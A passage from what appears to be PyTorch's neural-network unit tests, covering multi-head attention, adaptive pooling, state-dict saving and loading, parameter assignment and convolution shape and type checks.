reference = _fc(combined_attn_heads, multihead_attn_module.out_proj.weight, multihead_attn_module.out_proj.bias)
reference = np.squeeze(reference, axis=1)
# result = reference
self.assertEqual(tuple(result.shape), (batch_sz, d_model))
np.testing.assert_allclose(result, reference, atol=1e-5)
# result_weight = ref_attn_weight
result_weight = result_weight.detach().numpy()
self.assertEqual(tuple(result_weight.shape), tuple(ref_attn_weight.shape))
np.testing.assert_allclose(result_weight, ref_attn_weight, atol=1e-5)
def test_multihead_attn_add_bias_kv():
_multihead_attn_test_helper(add_bias_kv=True)
def test_multihead_attn_add_zero_attn():
_multihead_attn_test_helper(add_zero_attn=True)
def test_multihead_attn_no_masking():
_multihead_attn_test_helper()
def test_multihead_attn_key_padding_mask():
_multihead_attn_test_helper(add_key_padding_mask=True)
def test_multihead_attn_saved_kv():
_multihead_attn_test_helper(saved_kv=True)
def test_multihead_attn_add_bias_kv_zero_attn():
_multihead_attn_test_helper(add_key_padding_mask=True, add_bias_kv=True,
add_zero_attn=True)
def test_multihead_attn_all_arguments1():
_multihead_attn_test_helper(add_key_padding_mask=True, add_zero_attn=True, saved_kv=True)
def test_multihead_attn_all_arguments2():
_multihead_attn_test_helper(add_key_padding_mask=True, add_bias_kv=True,
add_zero_attn=True, saved_kv=True)
def test_multihead_attn_all_arguments3():
_multihead_attn_test_helper(add_key_padding_mask=True, add_zero_attn=True,
saved_kv=True, same_embed_dim=True)
def test_multihead_attn_all_arguments4():
_multihead_attn_test_helper(add_key_padding_mask=True, add_zero_attn=True,
saved_kv=True, same_embed_dim=True, byte_mask=True)
test_multihead_attn_add_zero_attn() # Test MultiheadAttention with add_zero_attn
test_multihead_attn_add_bias_kv() # Test MultiheadAttention with add_bias_kv
test_multihead_attn_no_masking() # Test MultiheadAttention without masking
test_multihead_attn_key_padding_mask() # Test MultiheadAttention with src lengths
test_multihead_attn_saved_kv() # Test MultiheadAttention with static kv.
test_multihead_attn_add_bias_kv_zero_attn() # Test MultiheadAttention with bias_kv and zero_attn.
test_multihead_attn_all_arguments1() # Test MultiheadAttention with all the argument.
with self.assertRaisesRegex(AssertionError, "bias cannot be added to static key."):
test_multihead_attn_all_arguments2() # Test MultiheadAttention with all the argument.
test_multihead_attn_all_arguments3() # Test MultiheadAttention with all the argument.
test_multihead_attn_all_arguments4() # Test MultiheadAttention with all the argument.
def test_multihead_attn_3d_attn_mask(self):
embed_dim = 8
num_heads = 4
batch_size = 8
src_len = 3
tgt_len = 2
query = torch.rand(batch_size, tgt_len, embed_dim) # [N, T, D]
key = torch.rand(batch_size, src_len, embed_dim) # [N, S, D]
value = key # [N, S, D]
attn_mask = torch.randint(0, 2, (batch_size, tgt_len, src_len)).float() # [N, T, S]
attn_mask = attn_mask.masked_fill(attn_mask == 0, float('-inf')).masked_fill(attn_mask == 1, float(0.0))
mta_model = torch.nn.MultiheadAttention(embed_dim, num_heads)
# Generate 3D results
attn_mask_3d = torch.repeat_interleave(attn_mask, num_heads, dim=0) # [N * H, T, S]
output_3d = mta_model(query.transpose(0, 1), key.transpose(0, 1), value.transpose(0, 1), attn_mask=attn_mask_3d)[0]
output_3d = output_3d.transpose(0, 1) # [N, T, D]
for i in range(0, batch_size):
output_2d = mta_model(query[i].unsqueeze(0).transpose(0, 1),
key[i].unsqueeze(0).transpose(0, 1),
value[i].unsqueeze(0).transpose(0, 1),
attn_mask=attn_mask[i])[0]
# output_2d in shape of [T, 1, D]
self.assertEqual(output_3d[i].unsqueeze(0).transpose(0, 1), output_2d)
def test_multihead_attn_no_bias(self):
embed_dim = 8
num_heads = 4
mha = torch.nn.MultiheadAttention(embed_dim, num_heads, bias=False)
# Verify that bias=False applies to both in and out projection layers.
self.assertIsNone(mha.in_proj_bias)
self.assertIsNone(mha.out_proj.bias)
def test_normalize(self):
inputs = torch.randn(1, 3, 4, 4, requires_grad=True)
self.assertTrue(gradcheck(lambda x: F.normalize(x, p=1, dim=-1), (inputs,)))
self.assertTrue(gradcheck(lambda x: F.normalize(x, p=2, dim=-2), (inputs,)))
inputs = torch.randn((), requires_grad=True)
self.assertTrue(gradcheck(lambda x: F.normalize(x, p=1, dim=-1), (inputs,)))
def test_adaptive_pooling_input_size(self):
for numel in (2, 3):
for pool_type in ('Max', 'Avg'):
cls_name = 'Adaptive{}Pool{}d'.format(pool_type, numel)
module_cls = getattr(nn, cls_name)
output_size = (2,) * numel
module = module_cls(output_size)
input = torch.randn(output_size)
self.assertRaises(ValueError, lambda: module(input))
def test_adaptive_pooling_size_none(self):
for numel in (2, 3):
for pool_type in ('Max', 'Avg'):
cls_name = 'Adaptive{}Pool{}d'.format(pool_type, numel)
module_cls = getattr(nn, cls_name)
output_size = (2,) * (numel - 1) + (None,)
module = module_cls(output_size)
input = torch.randn((4,) * (numel + 1))
output = module(input)
self.assertEqual(output.size(), (4,) + (2,) * (numel - 1) + (4,))
@unittest.skipIf(TEST_WITH_UBSAN, "signed integer overflow error with UBSAN")
def test_adaptive_pooling_size_overflow(self):
# 0x0x3fffffffffffffff * 2 * 2 = 0xfffffffffffffffc = -4 as int64_t
# Tensor::numel() return int64_t, so following check that negative allocs are correctly handled
self.assertRaises(
RuntimeError,
lambda: torch.nn.AdaptiveMaxPool1d(0x3fffffffffffffff)(torch.empty([2, 2, 2])))
def test_adaptive_pooling_avg_nhwc(self):
device_list = ['cpu']
if TEST_CUDA:
device_list.append('cuda')
for device in device_list:
input = torch.randint(1, 10, (4, 8, 8, 8), dtype=torch.float32).to(device)
input = input.contiguous(memory_format=torch.channels_last).requires_grad_()
grad = torch.randint(1, 10, (4, 8, 7, 7), dtype=torch.float32).to(device)
pool = torch.nn.AdaptiveAvgPool2d((7, 7)).to(device)
ref_input = input.detach().clone().contiguous().requires_grad_(True)
ref_grad = grad.detach().clone().contiguous()
ref_pool = torch.nn.AdaptiveAvgPool2d((7, 7)).to(device)
out = pool(input)
out.backward(grad)
ref_out = ref_pool(ref_input)
ref_out.backward(ref_grad)
self.assertTrue(out.is_contiguous(memory_format=torch.channels_last))
self.assertTrue(ref_out.is_contiguous())
self.assertEqual(out, ref_out)
self.assertEqual(input.grad, ref_input.grad)
def test_adaptive_pooling_avg_nhwc_non_contiguous(self):
device_list = ['cpu']
if TEST_CUDA:
device_list.append('cuda')
for device in device_list:
input = torch.randint(1, 10, (4, 8, 8, 8), dtype=torch.float32).to(device)
input = input.contiguous(memory_format=torch.channels_last)
input = input[:, ::2, :, :].requires_grad_()
grad = torch.randint(1, 10, (4, 8, 7, 7), dtype=torch.float32).to(device)
grad = grad[:, ::2, :, :]
pool = torch.nn.AdaptiveAvgPool2d((7, 7)).to(device)
ref_input = input.detach().clone().contiguous().requires_grad_(True)
ref_grad = grad.detach().clone().contiguous()
ref_pool = torch.nn.AdaptiveAvgPool2d((7, 7)).to(device)
out = pool(input)
out.backward(grad)
ref_out = ref_pool(ref_input)
ref_out.backward(ref_grad)
self.assertTrue(out.is_contiguous(memory_format=torch.channels_last))
self.assertTrue(ref_out.is_contiguous())
self.assertEqual(out, ref_out)
self.assertEqual(input.grad, ref_input.grad)
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
@largeTensorTest('12GB', device='cuda')
def test_adaptive_pooling_avg_nhwc_launch_config_backward(self):
input = torch.randint(1, 10, (1, 32, 2 ** 17 + 1, 32), dtype=torch.float32, device="cuda")
input = input.contiguous(memory_format=torch.channels_last).requires_grad_()
grad = torch.randint(1, 10, (1, 32, 10, 32), dtype=torch.float32, device="cuda")
pool = torch.nn.AdaptiveAvgPool2d((10, 32)).cuda()
ref_input = input.detach().clone().contiguous().requires_grad_(True)
ref_grad = grad.detach().clone().contiguous()
ref_pool = torch.nn.AdaptiveAvgPool2d((10, 32)).cuda()
out = pool(input)
out.backward(grad)
ref_out = ref_pool(ref_input)
ref_out.backward(ref_grad)
self.assertTrue(out.is_contiguous(memory_format=torch.channels_last))
self.assertTrue(ref_out.is_contiguous())
self.assertEqual(out, ref_out)
self.assertEqual(input.grad, ref_input.grad)
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
@largeTensorTest('12GB', device='cuda')
def test_adaptive_pooling_avg_nhwc_launch_config_forward(self):
input = torch.randint(1, 10, (1, 32, 16, 16), dtype=torch.float32, device="cuda")
input = input.contiguous(memory_format=torch.channels_last).requires_grad_()
pool = torch.nn.AdaptiveAvgPool2d((2 ** 17 + 1, 32)).cuda()
ref_input = input.detach().clone().contiguous().requires_grad_(True)
ref_pool = torch.nn.AdaptiveAvgPool2d((2 ** 17 + 1, 32)).cuda()
out = pool(input)
ref_out = ref_pool(ref_input)
self.assertTrue(out.is_contiguous(memory_format=torch.channels_last))
self.assertTrue(ref_out.is_contiguous())
self.assertEqual(out, ref_out)
@unittest.skipIf(not TEST_MULTIGPU, "multi-GPU not supported")
# Skip the test for ROCm as per https://github.com/pytorch/pytorch/issues/53190
@skipIfRocm
def test_broadcast_double_backwards_gpu(self):
tensors = (torch.randn(4, 4, device='cuda', requires_grad=True),
torch.randn(4, 4, device='cuda', requires_grad=True),
torch.randn(4, 4, device='cuda', requires_grad=True))
# TODO(#50743): the following segfaults with check_batched_grad=True
_assertGradAndGradgradChecks(self, lambda *i: Broadcast.apply((0, 1), *i), tensors,
check_batched_grad=False)
@unittest.skipIf(not TEST_MULTIGPU, "multi-GPU not supported")
def test_broadcast_not_requiring_grad(self):
variables = [
torch.randn(1, 2, device='cuda', requires_grad=True),
torch.randn(1, 2, device='cuda', requires_grad=False),
torch.randn(1, 2, device='cuda', requires_grad=False),
torch.randn(1, 2, device='cuda', requires_grad=True),
torch.randn(1, 2, device='cuda', requires_grad=True),
]
broadcasted_variables = Broadcast.apply((0, 1), *variables)
for output_idx, broadcasted_var in enumerate(broadcasted_variables):
input_var = variables[output_idx % len(variables)]
self.assertEqual(input_var.requires_grad, broadcasted_var.requires_grad)
@unittest.skipIf(not TEST_MULTIGPU, "multi-GPU not supported")
def test_broadcast_no_grad(self):
x = torch.randn(1, 2, dtype=torch.float32, requires_grad=True, device='cuda')
with torch.no_grad():
broadcasted = Broadcast.apply((0, 1), x)
self.assertTrue(x.requires_grad)
for output in broadcasted:
self.assertFalse(output.requires_grad)
def test_state_dict(self):
l = nn.Linear(5, 5)
block = nn.Module()
block.conv = nn.Conv2d(3, 3, 3, bias=False)
net = nn.Module()
net.linear1 = l
net.linear2 = l
net.bn = nn.BatchNorm2d(2)
net.block = block
net.add_module('empty', None)
state_dict = net.state_dict()
self.assertEqual(len(state_dict), 10)
self.assertEqual(len(state_dict._metadata), 6)
self.assertIn('', state_dict._metadata)
self.assertIn('linear1', state_dict._metadata)
self.assertIn('linear1.weight', state_dict)
self.assertIn('linear1.bias', state_dict)
self.assertIn('linear2', state_dict._metadata)
self.assertIn('linear2.weight', state_dict)
self.assertIn('linear2.bias', state_dict)
self.assertIn('block', state_dict._metadata)
self.assertIn('block.conv', state_dict._metadata)
self.assertIn('block.conv.weight', state_dict)
self.assertIn('block.conv.weight', state_dict)
self.assertNotIn('block.conv.bias', state_dict)
self.assertIn('bn', state_dict._metadata)
self.assertIn('bn.weight', state_dict)
self.assertIn('bn.bias', state_dict)
self.assertIn('bn.running_var', state_dict)
self.assertIn('bn.running_mean', state_dict)
self.assertIn('bn.num_batches_tracked', state_dict)
self.assertFalse(any(k.startswith('empty') for k in state_dict.keys()))
for k, v in state_dict.items():
param = net
for component in k.split('.'):
param = getattr(param, component)
if isinstance(param, Parameter):
param = param.data
self.assertEqual(v.data_ptr(), param.data_ptr())
l = nn.Linear(5, 5)
state_dict = l.state_dict()
self.assertEqual(len(state_dict), 2)
self.assertEqual(len(state_dict._metadata), 1)
self.assertIn('', state_dict._metadata)
self.assertTrue(state_dict._metadata['']['version'] >= 0)
self.assertEqual(state_dict['weight'].data_ptr(), l.weight.data_ptr())
self.assertEqual(state_dict['bias'].data_ptr(), l.bias.data_ptr())
def test_load_state_dict(self):
l = nn.Linear(5, 5)
block = nn.Module()
block.conv1 = nn.Conv2d(3, 3, 3, bias=True)
block.conv2 = nn.Conv2d(3, 3, 3, bias=False)
net = nn.Module()
net.linear1 = l
net.linear2 = l
net.bn = nn.BatchNorm2d(2)
net.block = block
net.add_module('empty', None)
conv1_bias_dtype = block.conv1.bias.dtype
state_dict = net.state_dict()
state_dict.update({
'linear1.weight': torch.ones(5, 5),
'block.conv1.bias': torch.arange(1, 4, dtype=conv1_bias_dtype),
'bn.running_mean': torch.randn(2),
})
# Also test if a DDP state_dict can be loaded from a local model.
ddp_state_dict = net.state_dict()
ddp_state_dict.update({
'module.linear1.weight': torch.ones(5, 5),
'module.block.conv1.bias': torch.arange(1, 4, dtype=conv1_bias_dtype),
'module.bn.running_mean': torch.randn(2),
})
torch.nn.modules.utils.consume_prefix_in_state_dict_if_present(ddp_state_dict, 'module.')
for sd in [state_dict, ddp_state_dict]:
incompatible_keys = net.load_state_dict(sd)
self.assertEqual(len(incompatible_keys.missing_keys), 0)
self.assertEqual(len(incompatible_keys.unexpected_keys), 0)
self.assertNotIn('Incompatible', str(incompatible_keys))
self.assertEqual(net.linear1.weight, sd['linear1.weight'])
self.assertEqual(net.block.conv1.bias, sd['block.conv1.bias'])
self.assertEqual(net.bn.running_mean, sd['bn.running_mean'])
state_dict = net.state_dict()
state_dict.update({'extra': torch.ones(5)})
self.assertRaises(RuntimeError, lambda: net.load_state_dict(state_dict))
incompatible_keys = net.load_state_dict(state_dict, strict=False)
self.assertEqual(len(incompatible_keys.missing_keys), 0)
self.assertEqual(len(incompatible_keys.unexpected_keys), 1)
self.assertIn('extra', incompatible_keys.unexpected_keys)
self.assertIn('Incompatible', str(incompatible_keys))
state_dict = net.state_dict()
state_dict.update({'extra.param': torch.ones(5)})
self.assertRaises(RuntimeError, lambda: net.load_state_dict(state_dict))
incompatible_keys = net.load_state_dict(state_dict, strict=False)
self.assertEqual(len(incompatible_keys.missing_keys), 0)
self.assertEqual(len(incompatible_keys.unexpected_keys), 1)
self.assertIn('extra.param', incompatible_keys.unexpected_keys)
state_dict = net.state_dict()
del state_dict['linear1.weight']
self.assertRaises(RuntimeError, lambda: net.load_state_dict(state_dict))
incompatible_keys = net.load_state_dict(state_dict, strict=False)
self.assertEqual(len(incompatible_keys.missing_keys), 1)
self.assertEqual(len(incompatible_keys.unexpected_keys), 0)
self.assertIn('linear1.weight', incompatible_keys.missing_keys)
state_dict.update({'extra.param': torch.ones(5)})
self.assertRaises(RuntimeError, lambda: net.load_state_dict(state_dict))
incompatible_keys = net.load_state_dict(state_dict, strict=False)
self.assertEqual(len(incompatible_keys.missing_keys), 1)
self.assertEqual(len(incompatible_keys.unexpected_keys), 1)
self.assertIn('linear1.weight', incompatible_keys.missing_keys)
self.assertIn('extra.param', incompatible_keys.unexpected_keys)
state_dict = net.state_dict()
state_dict.update({'bn.running_mean': torch.rand(14, 4)}) # wrong size
self.assertRaises(RuntimeError, lambda: net.load_state_dict(state_dict))
self.assertRaises(RuntimeError, lambda: net.load_state_dict(state_dict, strict=False))
state_dict = net.state_dict()
old_state_dict = deepcopy(state_dict)
state_dict = {
'linear1.weight': torch.ones(5, 5),
'block.conv1.bias': torch.arange(1, 4, dtype=conv1_bias_dtype),
'bn.running_mean': torch.randn(2),
'nonexistent_key': torch.rand(3)
}
net.load_state_dict(state_dict, strict=False)
self.assertEqual(net.linear1.weight, state_dict['linear1.weight'])
self.assertEqual(net.block.conv1.bias, state_dict['block.conv1.bias'])
self.assertEqual(net.bn.running_mean, state_dict['bn.running_mean'])
new_state_dict = net.state_dict()
del old_state_dict['linear1.weight']
del old_state_dict['block.conv1.bias']
del old_state_dict['bn.running_mean']
for k, v, in old_state_dict.items():
self.assertTrue(v.equal(new_state_dict[k]))
def test_load_state_dict_BC(self):
# BatchNormNd
# Added num_batches_tracked buffer at version 2. For state dict with
# earlier versions or no versions, it should provide default value of 0.
bn = nn.BatchNorm2d(3)
state_dict = bn.state_dict()
del state_dict['num_batches_tracked']
state_dict._metadata['']['version'] = 1 # version 1
bn.load_state_dict(state_dict)
self.assertEqual(bn.num_batches_tracked.dtype, torch.long)
self.assertEqual(bn.num_batches_tracked.item(), 0)
del state_dict._metadata['']['version'] # no version
bn.load_state_dict(state_dict)
self.assertEqual(bn.num_batches_tracked.dtype, torch.long)
self.assertEqual(bn.num_batches_tracked.item(), 0)
def test_load_state_dict_ref_cycle(self):
# load_state_dict shouldn't cause a reference cycle involving Tensors
import gc
m = torch.nn.LSTM(16, 16, bidirectional=True)
gc.collect()
m.load_state_dict(deepcopy(m).state_dict())
refcycles = gc.collect()
self.assertEqual(refcycles, 0)
def test_load_state_dict_custom(self):
class CustomState(nn.Module):
def __init__(self):
super(CustomState, self).__init__()
self.param = torch.nn.Parameter(torch.ones(1))
self.sub = torch.nn.Linear(5, 5)
def _save_to_state_dict(self, destination, prefix, keep_vars):
destination[prefix + "serialized"] = self.param.data + 1
def _load_from_state_dict(self, state_dict, prefix, local_metadata,
strict, missing_keys, unexpected_keys,
error_msgs):
# skip some of the error handling
self.param.data.copy_(state_dict[prefix + "serialized"] - 1)
# use sequential to verify nesting
m = nn.Sequential(CustomState())
with torch.no_grad():
m[0].param[0] = 10
m[0].sub.weight[0, 0] = 555
state_dict = m.state_dict()
self.assertEqual(state_dict["0.serialized"].item(), 11)
self.assertIn("0.sub.weight", state_dict)
self.assertNotIn("0.param", state_dict)
del m
mm = nn.Sequential(CustomState())
self.assertEqual(mm[0].param[0].item(), 1)
mm.load_state_dict(state_dict)
self.assertEqual(mm[0].param[0].item(), 10)
self.assertEqual(mm[0].sub.weight[0, 0].item(), 555)
def test_extra_state(self):
class SubModule(torch.nn.Module):
def __init__(self, foo):
super().__init__()
self.foo = foo
def get_extra_state(self):
return {
'foo': self.foo
}
def set_extra_state(self, state):
self.foo = state['foo']
class MyModule(torch.nn.Module):
def __init__(self, foo, bar):
super().__init__()
self.sub = SubModule(foo)
self.bar = bar
def get_extra_state(self):
return {
'bar': self.bar
}
def set_extra_state(self, state):
self.bar = state['bar']
# Ensure state_dict contains the extra state by loading it into another module.
m = MyModule(3, 'something')
m2 = MyModule(5, 'something else')
m2.load_state_dict(m.state_dict())
self.assertEqual(m.state_dict(), m2.state_dict())
self.assertEqual(m2.bar, m.bar)
self.assertEqual(m2.sub.foo, m.sub.foo)
def test_extra_state_non_dict(self):
class MyModule(torch.nn.Module):
def __init__(self, foo):
super().__init__()
self.foo = foo
def get_extra_state(self):
return self.foo
def set_extra_state(self, state):
self.foo = state
# Test various types of extra state.
for state in ('something', 5, MyModule(3)):
m = MyModule(state)
m2 = MyModule('something else')
m2.load_state_dict(m.state_dict())
self.assertEqual(m.state_dict(), m2.state_dict())
self.assertEqual(m.foo, m2.foo)
def test_extra_state_missing_set_extra_state(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
def get_extra_state(self):
return {
'foo': 5
}
m = MyModule()
with self.assertRaisesRegex(RuntimeError, 'Unexpected key'):
m.load_state_dict(m.state_dict())
def test_extra_state_missing_get_extra_state(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
def set_extra_state(self):
pass
m = MyModule()
with self.assertRaisesRegex(RuntimeError, 'Missing key'):
m.load_state_dict(m.state_dict())
def test_parameter_assignment(self):
l = nn.Linear(5, 5)
def num_params():
return len(list(l.parameters()))
self.assertEqual(num_params(), 2)
new_param = Parameter(torch.randn(5, 5))
l.param_name = new_param
self.assertEqual(num_params(), 3)
self.assertObjectIn(new_param, l.parameters())
var = torch.randn(5, 5)
l.var_name = var
self.assertEqual(num_params(), 3)
self.assertNotIn(id(var), map(id, l.parameters()))
# Make sure Variables are not saved as parameters
l.variable_attr = torch.empty(5, 5)
self.assertEqual(num_params(), 3)
l.param_attr = Parameter(torch.empty(5, 5))
self.assertEqual(num_params(), 4)
# It shouldn't be possible to replace a parameter with a Variable
def assign_var():
l.param_attr = torch.empty(5, 5)
self.assertRaises(TypeError, assign_var)
# But replacing it with None should be fine
l.param_attr = None
self.assertEqual(num_params(), 3)
def test_assignment(self):
l = nn.Module()
a = nn.Parameter(torch.randn(2))
b = nn.Parameter(torch.randn(3))
c = nn.Parameter(torch.randn(4))
q = nn.Linear(4, 4)
r = nn.Linear(5, 5)
w = nn.Linear(6, 6)
def test_assignments(get_list, a, b, c):
# Check that None can be shadowed
l.a = None
self.assertIsNone(l.a)
self.assertIn('a', l.__dict__)
l.a = a
self.assertIs(l.a, a)
self.assertEqual(get_list(), [a])
self.assertNotIn('a', l.__dict__)
# Assign second object
l.b = None
self.assertIsNone(l.b)
self.assertIn('b', l.__dict__)
l.b = b
self.assertIs(l.b, b)
self.assertEqual(get_list(), [a, b])
self.assertNotIn('b', l.__dict__)
# Remove and add the object back. Order should be unchanged.
l.a = None
self.assertIsNone(l.a)
self.assertEqual(get_list(), [b])
l.a = a
self.assertIs(l.a, a)
self.assertEqual(get_list(), [a, b])
# Replace object with another one. Order should be unchanged.
l.a = c
self.assertIs(l.a, c)
self.assertEqual(get_list(), [c, b])
# Remove and reassign an attribute. It should appear at the end of the list now.
del l.a
self.assertFalse(hasattr(l, 'a'))
l.a = a
self.assertIs(l.a, a)
self.assertEqual(get_list(), [b, a])
test_assignments(lambda: list(l.parameters()), a, b, c)
del l.a, l.b
self.assertEqual(list(l.parameters()), [])
test_assignments(lambda: list(l.children()), q, r, w)
del l.a, l.b
self.assertEqual(list(l.children()), [])
buf = torch.randn(10)
l.register_buffer('buf', buf)
self.assertIs(l.buf, buf)
l.buf = None
self.assertIs(l.buf, None)
self.assertNotIn('buf', l.__dict__) # should be stored in l._buffers
l.buf = buf
self.assertIn('buf', l.state_dict())
self.assertEqual(l.state_dict()['buf'], buf)
@unittest.skipIf(not TEST_CUDA, 'CUDA not available')
def test_thnn_conv_strided_padded_dilated(self):
for convfn, dims, transposed in (
(torch.nn.functional.conv2d, 2, False),
(torch.nn.functional.conv_transpose2d, 2, True),
(torch.nn.functional.conv3d, 3, False),
(torch.nn.functional.conv_transpose3d, 3, True)):
for stride, padding, dilation in (
(2, 0, 1), (1, 1, 1), (2, 1, 1), (1, 0, 2)):
kwargs = {"stride": stride, "padding": padding, "dilation": dilation}
inp_shape = (1, 2) + dims * (4,)
weight_shape = (2, 2) + dims * (1,)
inputs = torch.randn(inp_shape, dtype=torch.double, device="cuda", requires_grad=True)
weight = torch.randn(weight_shape, dtype=torch.double, device="cuda", requires_grad=True)
bias = torch.randn(2, dtype=torch.double, device="cuda", requires_grad=True)
with torch.backends.cudnn.flags(enabled=False):
res = convfn(inputs, weight, bias, **kwargs)
res_cpu = convfn(inputs.cpu(), weight.cpu(), bias.cpu(), **kwargs)
self.assertEqual(res, res_cpu)
with torch.backends.cudnn.flags(enabled=False):
torch.autograd.gradcheck(
lambda x, w, b: convfn(x, w, b, **kwargs),
(inputs, weight, bias)
)
torch.autograd.gradcheck(
lambda x, w, b: convfn(x, w, b, **kwargs),
(inputs.cpu(), weight.cpu(), bias.cpu())
)
def test_Conv2d_inconsistent_types(self):
inputs = torch.randn(4, 1, 7, 7, dtype=torch.float)
weights = torch.randn(1, 1, 3, 3, dtype=torch.double)
# inconsistent types should raise an exception
self.assertRaises(RuntimeError, lambda: nn.functional.conv2d(inputs, weights))
# but it should work with the same type
nn.functional.conv2d(inputs.float(), weights.float())
@unittest.skipIf(not TEST_CUDA, 'CUDA not available')
def test_Conv2d_inconsistent_types_on_GPU_without_cudnn(self):
inputs = torch.randn(4, 1, 7, 7, dtype=torch.float, device="cuda")
weights = torch.randn(1, 1, 3, 3, dtype=torch.double, device="cuda")
bias = torch.randn(1, dtype=torch.double, device="cuda")
with torch.backends.cudnn.flags(enabled=False):
# inconsistent types should raise an exception
self.assertRaises(RuntimeError, lambda: nn.functional.conv2d(inputs, weights))
self.assertRaises(RuntimeError, lambda: nn.functional.conv2d(inputs, weights.float(), bias))
# but it should work with the same type
nn.functional.conv2d(inputs.float(), weights.float(), bias.float())
def test_Conv2d_1x1(self):
in_channels = 2
out_channels = 2
mod = torch.nn.Conv2d(2, 2, 1, bias=False).to(dtype=torch.double)
input = torch.randn(1, in_channels, 5, 5, requires_grad=True, dtype=torch.double)
for enabled in (False, True):
with torch.backends.mkldnn.flags(enabled=enabled):
gradcheck(F.conv2d, (input, mod.weight))
def test_Conv2d_OneDNN(self):
def run_once(group_val=24, dilation=1):
ifm = torch.ones([1, group_val, 6, 6], dtype=torch.float32)
weights = torch.ones([group_val, 1, 3, 3], dtype=torch.float32)
op = torch.nn.Conv2d(
in_channels=group_val,
out_channels=group_val,
kernel_size=[3, 3],
stride=[2, 2],
padding=[1, 1],
dilation=[dilation, dilation],
groups=group_val,
bias=False,
padding_mode='zeros'
)
op.weight.data = weights
res = op(ifm)
grad_in = torch.ones(res.shape, dtype=torch.float32)
res.backward(grad_in)
return op.weight.grad
for gorup_val in (24, 48, 23, 25):
for dilation in (1, 2):
with torch.backends.mkldnn.flags(enabled=False):
without_onednn = run_once(gorup_val, dilation)
with torch.backends.mkldnn.flags(enabled=True):
with_onednn = run_once(gorup_val, dilation)
self.assertEqual(without_onednn, with_onednn)
@unittest.skipIf(not TEST_CUDA, 'CUDA not available')
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_cudnn_non_contiguous(self):
x = torch.randn(192, 16, 50).cuda()
x = x.permute(0, 2, 1).contiguous().permute(0, 2, 1)
m = torch.nn.Conv1d(
in_channels=16,
out_channels=32,
kernel_size=2,
bias=True).cuda()
result = m(x)
@unittest.skipIf(not TEST_CUDA, 'CUDA not available')
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_Conv2d_inconsistent_types_on_GPU_with_cudnn(self):
inputs = torch.randn(4, 1, 7, 7, dtype=torch.float, device="cuda")
weights = torch.randn(1, 1, 3, 3, dtype=torch.double, device="cuda")
bias = torch.randn(1, dtype=torch.double, device="cuda")
with torch.backends.cudnn.flags(enabled=True):
# inconsistent types should raise an exception
self.assertRaises(RuntimeError, lambda: nn.functional.conv2d(inputs, weights))
self.assertRaises(RuntimeError, lambda: nn.functional.conv2d(inputs, weights.float(), bias))
# but it should work with the same type
nn.functional.conv2d(inputs.float(), weights.float(), bias.float())
@unittest.skipIf(not TEST_CUDA, 'CUDA not available')
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
@repeat_test_for_types(get_all_fp_dtypes(include_bfloat16=AMPERE_OR_ROCM))
def test_Conv2d_deterministic_cudnn(self, dtype=torch.float):
inputs = torch.randn(2, 3, 5, 5, device="cuda", dtype=dtype, requires_grad=True)
with cudnn.flags(enabled=True, benchmark=True, deterministic=True):
conv1 = torch.nn.Conv2d(3, 3, 3).to("cuda", dtype)
conv2 = torch.nn.Conv2d(3, 3, 3).to("cuda", dtype)
conv2.bias.data.copy_(conv1.bias.data)
conv2.weight.data.copy_(conv1.weight.data)
out1 = conv1(inputs)
out2 = conv2(inputs)
self.assertEqual(out1, out2, atol=0.0, rtol=0)
y = torch.randn(out1.size(), device="cuda", dtype=dtype)
out1.backward(y)
out2.backward(y)
self.assertEqual(conv1.bias.grad.data, conv2.bias.grad.data, atol=0.0, rtol=0)
self.assertEqual(conv1.weight.grad.data, conv2.weight.grad.data, atol=0.0, rtol=0)
def test_Conv2d_missing_argument(self):
c = nn.Conv2d(3, 3, 3)
self.assertRaises(TypeError, lambda: c(None))
def test_Conv2d_backward_twice(self):
input = torch.randn(2, 3, 5, 5)
c = nn.Conv2d(3, 3, 3)
o1 = c(input)
o1.sum().backward()
self.assertRaisesRegex(RuntimeError, 'Specify retain_graph=True',
lambda: o1.sum().backward())
@unittest.skipIf(not TEST_CUDA, 'CUDA not available')
@repeat_test_for_types(get_all_fp_dtypes(include_bfloat16=AMPERE_OR_ROCM))
def test_Conv2d_large_workspace(self, dtype=torch.float):
# These sizes require huge cuDNN workspaces. Make sure we choose a
# reasonable algorithm that does not run out of memory
sizes = [
(1, 256, 109, 175),
(1, 256, 80, 128),
(1, 256, 120, 192),
]
def run_test(benchmark):
with torch.backends.cudnn.flags(benchmark=benchmark):
conv = torch.nn.Conv2d(256, 256, kernel_size=3, padding=1).to("cuda", dtype)
for size in sizes:
x = torch.randn(size, device="cuda", dtype=dtype)
out = conv(x.detach().clone().requires_grad_())
out.backward(torch.ones_like(out))
run_test(benchmark=False)
run_test(benchmark=True)
def test_conv_modules_raise_error_on_incorrect_input_size(self):
for dtype in [torch.bfloat16, torch.double, torch.float]:
modules = [nn.Conv1d(3, 8, 3).to(dtype), nn.ConvTranspose1d(3, 8, 3).to(dtype),
nn.Conv2d(3, 8, 3).to(dtype), nn.ConvTranspose2d(3, 8, 3).to(dtype),
nn.Conv3d(3, 8, 3).to(dtype), nn.ConvTranspose3d(3, 8, 3).to(dtype)]
invalid_input_dims = [(2, 4), (2, 4),
(3, 5), (3, 5),
(4, 6), (4, 6)]
for invalid_dims, module in zip(invalid_input_dims, modules):
for dims in invalid_dims:
input = torch.empty(torch.Size((3, ) * dims))
self.assertRaises(RuntimeError, lambda: module(input))
def test_conv_shapecheck(self):
def test(should_raise, module, input_size, dtype):
input = torch.empty(3, *input_size).to(dtype)
if should_raise:
self.assertRaises(RuntimeError, lambda: module(input))
else:
# just run it to ensure no exception raised.
module(input)
for dtype in [torch.bfloat16, torch.float, torch.double]:
# Conv1d
test(True, nn.Conv1d(1, 1, 3).to(dtype), (1, 2), dtype)
test(True, nn.Conv1d(1, 1, 3, stride=2).to(dtype), (1, 2), dtype)
test(False, nn.Conv1d(1, 1, 2).to(dtype), (1, 2), dtype)
test(False, nn.Conv1d(1, 1, 2, stride=2).to(dtype), (1, 2), dtype)
test(False, nn.Conv1d(1, 1, 3, stride=2, padding=1).to(dtype), (1, 2), dtype)
# Conv2d
